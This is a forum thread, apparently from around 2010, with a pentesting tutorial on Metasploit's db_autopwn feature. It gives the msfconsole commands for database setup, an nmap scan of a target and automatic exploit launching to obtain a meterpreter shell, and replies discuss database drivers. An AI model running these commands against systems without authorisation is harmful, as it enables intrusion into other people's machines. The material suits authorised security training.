Op please see your PM box with a note from me. Thanks.
MSF from the moment of its release is THE most powerful offensive tool in a pentesters arsenal. In this tutorial i plan to show how to use autopwn feature of MSF from scanning to getting a meterpreter shell.
Lets boot up trusty ol BT4 R1. Bring up your favourite terminal emulator.
We'll use msf console because its much less cluttered than GUI.Code:cd /pentest/exploits/framework3
wait a few minutes for MSF to load all modules and exploits.Code:./msfconsole
Now that we have the msfconsole up and running we need to select a database driver to store info about our target..i prefer sqlite3 cause it doesnt need any further setup for me
now we need to create a new database to store the infoCode:db_driver sqlite3
feel free to replace autopwn with any nameCode:db_create autopwn
we are connected to the database.Code:db_connect
Run a simple nmap scan to enumerate the host
to see host informationCode:db_nmap target
AND finally for the actual autopwn jst runCode:db_hosts
and there you have it...if an exploit worked you'll have a session...Code:db_autopwn -p -t -e
if you dont well better luck next time
It should be noted that the usage of sqlite3 is not supported by metasploit, and there are other forum threads regarding this --read postgres
Last edited by sickness; 11-07-2010 at 08:53 PM.
A little help regarding what @iproute said: http://www.backtrack-linux.org/forum...ostgresql.html
Tanks for sharing
Sorry about using sqlite3.didnt kno it was supported.. in my box it runs without a hitch tho..but other drivers dont run outof the box..this was before i saw sickness' post on postgreSQL of course...
there are some reasons one might want to use sqlite instead of postgres or mysql for metasploit, but with the latter two, running db_autopwn will likely be more effective. I've run the same autopwn against the same vulnerable VM and witnessed this myself.
Also if you need to do reporting, sqlite may not be as well suited.
A great resource for metasploit other than the most excellent metasploit framework unleashed course can be found by performing a google search for 'metasploit megaprimer'.